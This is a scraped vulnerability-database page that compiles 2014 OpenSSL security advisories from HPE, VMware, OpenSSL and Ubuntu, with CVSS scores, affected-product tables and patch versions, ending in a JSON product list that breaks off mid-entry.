- HP StoreVirtual 4530 600GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4630 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 600GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2010-5298
4.8 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L
4.0 (AV:N/AC:H/Au:N/C:N/I:P/A:P)
CVE-2014-0076
4.0 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1.9 (AV:L/AC:M/Au:N/C:P/I:N/A:N)
CVE-2014-0195
7.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVE-2014-0198
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CVE-2014-0221
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CVE-2014-0224
6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVE-2014-3470
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CVE-2014-3566
3.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N
4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CVE-2016-0705
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE recommends applying the following software updates to resolve the vulnerabilities in the impacted versions of HPE StoreVirtual products running HPE LeftHand OS.
LeftHand OS v11.5 - Patches 45019-00 and 45020 LeftHand OS v12.0 - Patches 50016-00 and 50017-00 LeftHand OS v12.5 - Patch 55016-00 LeftHand OS v12.6 - Patch 56002-00
Notes:
These patches enable TLSv1.2 protocol and upgrades the OpenSSL RPM revision to OpenSSL v1.0.1e 48. These patches migrate Certificate Authority Hashing Algorithm from a weak hashing algorithm SHA1 to the stronger hashing algorithm SHA256. Summary
VMware product updates address OpenSSL security vulnerabilities. Relevant Releases
ESXi 5.5 prior to ESXi550-201406401-SG
- Problem Description
a.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2014-0224, CVE-2014-0198,
CVE-2010-5298, CVE-2014-3470, CVE-2014-0221 and CVE-2014-0195 to
these issues. The most important of these issues is
CVE-2014-0224.
CVE-2014-0198, CVE-2010-5298 and CVE-2014-3470 are considered to
be of moderate severity. Exploitation is highly unlikely or is
mitigated due to the application configuration.
CVE-2014-0221 and CVE-2014-0195, which are listed in the OpenSSL
Security Advisory (see Reference section below), do not affect
any VMware products. For readability
the affected products have been split into 3 tables below,
based on the different client-server configurations and
deployment scenarios. Applying these patches to
affected servers will mitigate the affected clients (See Table 1
below). can be mitigated by using a secure network such as
VPN (see Table 2 below).
Clients and servers that are deployed on an isolated network are
less exposed to CVE-2014-0224 (see Table 3 below). The affected
products are typically deployed to communicate over the
management network.
RECOMMENDATIONS
VMware recommends customers evaluate and deploy patches for
affected Servers in Table 1 below as these patches become
available. Patching these servers will remove the ability to
exploit the vulnerability described in CVE-2014-0224 on both
clients and servers. VMware recommends customers consider
applying patches to products listed in Table 2 & 3 as required.
Column 4 of the following tables lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============== ======= ======= =============
ESXi 5.5 ESXi ESXi550-
201406401-SG
Big Data Extensions 1.1 patch pending
Charge Back Manager 2.6 patch pending
Horizon Workspace Server
GATEWAY 1.8.1 patch pending
Horizon Workspace Server
GATEWAY 1.5 patch pending
Horizon Workspace Server
DATA 1.8.1 patch pending
Horizon Mirage Edge Gateway 4.4.2 patch pending
Horizon View 5.3.1 patch pending
Horizon View Feature Pack 5.3 SP2 patch pending
NSX for Multi-Hypervisor 4.1.2 patch pending
NSX for Multi-Hypervisor 4.0.3 patch pending
NSX for vSphere 6.0.4 patch pending
NVP 3.2.2 patch pending
vCAC 6.0.1 patch pending
vCloud Networking and Security 5.5.2 patch pending
vCloud Networking and Security 5.1.2 patch pending
vFabric Web Server 5.3.4 patch pending
vCHS - DPS-Data Protection 2.0 patch pending
Service
Table 2
========
Affected clients running a vulnerable version of OpenSSL 0.9.8
or 1.0.1 and communicating over an untrusted network.
VMware Product Running Replace with/
Product Version on Apply Patch
============== ======= ======= =============
vCSA 5.5 patch pending
vCSA 5.1 patch pending
vCSA 5.0 patch pending
ESXi 5.1 ESXi patch pending
ESXi 5.0 ESXi patch pending
Workstation 10.0.2 any patch pending
Workstation 9.0.3 any patch pending
Fusion 6.x OSX patch pending
Fusion 5.x OSX patch pending
Player 10.0.2 any patch pending
Player 9.0.3 any patch pending
Chargeback Manager 2.5.x patch pending
Horizon Workspace Client for 1.8.1 OSX patch pending
Mac
Horizon Workspace Client for 1.5 OSX patch pending
Mac
Horizon Workspace Client for 1.8.1 Windows patch pending
Windows
Horizon Workspace Client for 1.5 Windows patch pending
OVF Tool 3.5.1 patch pending
OVF Tool 3.0.1 patch pending
vCenter Operations Manager 5.8.1 patch pending
vCenter Support Assistant 5.5.0 patch pending
vCenter Support Assistant 5.5.1 patch pending
vCD 5.1.2 patch pending
vCD 5.1.3 patch pending
vCD 5.5.1.1 patch pending
vCenter Site Recovery Manager 5.0.3.1 patch pending
Table 3
=======
The following table lists all affected clients running a
vulnerable version of OpenSSL 0.9.8 or 1.0.1 and communicating
over an untrusted network.
VMware Product Running Replace with/
Product Version on Apply Patch
============== ======= ======= =============
vCenter Server 5.5 any patch pending
vCenter Server 5.1 any patch pending
vCenter Server 5.0 any patch pending
Update Manager 5.5 Windows patch pending
Update Manager 5.1 Windows patch pending
Update Manager 5.0 Windows patch pending
Config Manager (VCM) 5.6 patch pending
Horizon View Client 5.3.1 patch pending
Horizon View Client 4.x patch pending
Horizon Workspace 1.8.1 patch pending
Horizon Workspace 1.5 patch pending
ITBM Standard 1.0.1 patch pending
ITBM Standard 1.0 patch pending
Studio 2.6.0.0 patch pending
Usage Meter 3.3 patch pending
vCenter Chargeback Manager 2.6 patch pending
vCenter Converter Standalone 5.5 patch pending
vCenter Converter Standalone 5.1 patch pending
vCD (VCHS) 5.6.2 patch pending
vCenter Site Recovery Manager 5.5.1 patch pending
vCenter Site Recovery Manager 5.1.1 patch pending
vFabric Application Director 5.2.0 patch pending
vFabric Application Director 5.0.0 patch pending
View Client 5.3.1 patch pending
View Client 4.x patch pending
VIX API 5.5 patch pending
VIX API 1.12 patch pending
vMA (Management Assistant) 5.1.0.1 patch pending
VMware Data Recovery 2.0.3 patch pending
VMware vSphere CLI 5.5 patch pending
vSphere Replication 5.5.1 patch pending
vSphere Replication 5.6 patch pending
vSphere SDK for Perl 5.5 patch pending
vSphere Storage Appliance 5.5.1 patch pending
vSphere Storage Appliance 5.1.3 patch pending
vSphere Support Assistant 5.5.1 patch pending
vSphere Support Assistant 5.5.0 patch pending
vSphere Virtual Disk 5.5 patch pending
Development Kit
vSphere Virtual Disk 5.1 patch pending
Development Kit
vSphere Virtual Disk 5.0 patch pending
Development Kit
- Solution
ESXi 5.5
Download: https://www.vmware.com/patchmgr/download.portal
Release Notes and Remediation Instructions: http://kb.vmware.com/kb/2077359
- Change Log
2014-06-10 VMSA-2014-0006 Initial security advisory in conjunction with the release of ESXi 5.5 updates on 2014-06-10
- Contact
E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
security-announce at lists.vmware.com
bugtraq at securityfocus.com
fulldisclosure at seclists.org
E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories http://www.vmware.com/security/advisories
VMware Security Response Policy https://www.vmware.com/support/policies/security_response.html
VMware Lifecycle Support Phases https://www.vmware.com/support/policies/lifecycle.html
Twitter https://twitter.com/VMwareSRC
Copyright 2014 VMware Inc. All rights reserved.
The attack can only be performed between a vulnerable client and server.
Thanks to KIKUCHI Masashi (Lepidum Co. Ltd.) for discovering and researching this issue. This issue was reported to OpenSSL on 1st May 2014 via JPCERT/CC.
The fix was developed by Stephen Henson of the OpenSSL core team partly based on an original patch from KIKUCHI Masashi.
DTLS recursion flaw (CVE-2014-0221)
By sending an invalid DTLS handshake to an OpenSSL DTLS client the code can be made to recurse eventually crashing in a DoS attack.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h.
Thanks to Imre Rad (Search-Lab Ltd.) for discovering this issue. This issue was reported to OpenSSL on 9th May 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h.
Thanks to Jüri Aedla for reporting this issue. This issue was reported to OpenSSL on 23rd April 2014 via HP ZDI.
The fix was developed by Stephen Henson of the OpenSSL core team. This flaw only affects OpenSSL 1.0.0 and 1.0.1 where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the default and not common.
OpenSSL 1.0.0 users should upgrade to 1.0.0m. OpenSSL 1.0.1 users should upgrade to 1.0.1h.
This issue was reported in public. The fix was developed by Matt Caswell of the OpenSSL development team. This flaw only affects multithreaded applications using OpenSSL 1.0.0 and 1.0.1, where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the default and not common.
OpenSSL 1.0.0 users should upgrade to 1.0.0m. OpenSSL 1.0.1 users should upgrade to 1.0.1h.
This issue was reported in public.
OpenSSL 0.9.8 users should upgrade to 0.9.8za OpenSSL 1.0.0 users should upgrade to 1.0.0m. OpenSSL 1.0.1 users should upgrade to 1.0.1h.
Thanks to Felix Gröbert and Ivan Fratrić at Google for discovering this issue. This issue was reported to OpenSSL on 28th May 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
Other issues
OpenSSL 1.0.0m and OpenSSL 0.9.8za also contain a fix for CVE-2014-0076: Fix for the attack described in the paper "Recovering OpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack" Reported by Yuval Yarom and Naomi Benger. This issue was previously fixed in OpenSSL 1.0.1g.
References
URL for this Security Advisory: http://www.openssl.org/news/secadv_20140605.txt
Note: the online version of the advisory may be updated with additional details over time.
HP Systems Insight Manager v7.3 Hotfix kit HP Systems Insight Manager v7.2 Hotfix kit
http://h18013.www1.hp.com/products/servers/management/hpsim/download.html
NOTE: No reboot of the system is required after applying the HP SIM Hotfix kit. ============================================================================ Ubuntu Security Notice USN-2192-1 May 05, 2014
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 13.10
- Ubuntu 12.10
- Ubuntu 12.04 LTS
Summary:
OpenSSL could be made to crash if it received specially crafted network traffic. (CVE-2010-5298)
It was discovered that OpenSSL incorrectly handled memory in the do_ssl3_write() function. (CVE-2014-0198)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.1
Ubuntu 13.10: libssl1.0.0 1.0.1e-3ubuntu1.3
Ubuntu 12.10: libssl1.0.0 1.0.1c-3ubuntu2.8
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.13
After a standard system update you need to reboot your computer to make all the necessary changes
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201404-0008", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "19" }, { "model": "linux enterprise software development kit", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "mariadb", "scope": "lt", "trust": 1.0, "vendor": "mariadb", "version": "10.0.13" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "20" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "linux enterprise desktop", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "mariadb", "scope": "gte", "trust": 1.0, "vendor": "mariadb", "version": "10.0.0" }, { "model": "linux enterprise workstation extension", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "linux enterprise server", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "bladecenter advanced management module 3.66e", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "ssl vpn 8.0r4", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "security enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.3" }, { "model": "real-time compression appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.8.106" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "spa232d multi-line dect ata", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "policy center v100r003c00spc305", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "solaris", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "11.1.20.5.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.9" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "junos d30", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x45" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.2" }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "58200" }, { "model": "documentum content server p06", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos os 13.1r4-s3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "junos 12.1r8-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "ip video phone e20", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "project openssl g", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "ios software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 12.1x46-d25", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ios xe software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.5" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "mate products", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.12" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.6.1" }, { "model": "cp1543-1", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "junos 12.1r", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "isoc v200r001c00spc202", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "3000" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "60000" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.9" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "small business isa500 series integrated security appliances", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "srg1200\u00262200\u00263200 v100r002c02hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security network intrusion prevention system gx3002", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "9.2" }, { "model": "ace application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1" }, { "model": "junos 12.3r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413011.5" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3100v2-480" }, { "model": "junos 13.3r3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 11.4r11", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.28" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.470" }, { "model": "systems insight manager 7.3.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "56000" }, { "model": "anyconnect secure mobility client for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1.3" }, { "model": "uacos c4.4r11.1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "dsr-500n 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "junos 12.1x44-d35", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "msr3000 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "video surveillance series ip camera", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "idp 4.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "10.4" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.3" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2" }, { "model": "m220 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7775" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "usg9500 usg9500 v300r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s2750\u0026s5700\u0026s6700 v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "58300" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "spa510 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "espace u19** v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "4800g switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.1" }, { "model": "junos 12.1x44-d34", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "uma v200r001c00spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "idp 4.1r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.3" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.5" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "usg9500 v200r001c01sph902", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "vpn client v100r001c02spc702", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "secure analytics 2013.2r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "uma v200r001c00spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "oceanstor s6800t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junos 12.1x47-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.4" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "isoc v200r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "3000" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "119000" }, { "model": "secure analytics 2014.2r3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "enterprise linux server eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "9.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "simatic wincc oa", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "3.12" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.2" }, { "model": "junos 13.1r3-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "manageone v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "eupp v100r001c10spc002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "10" }, { "model": "prime performance manager for sps", "scope": "eq", 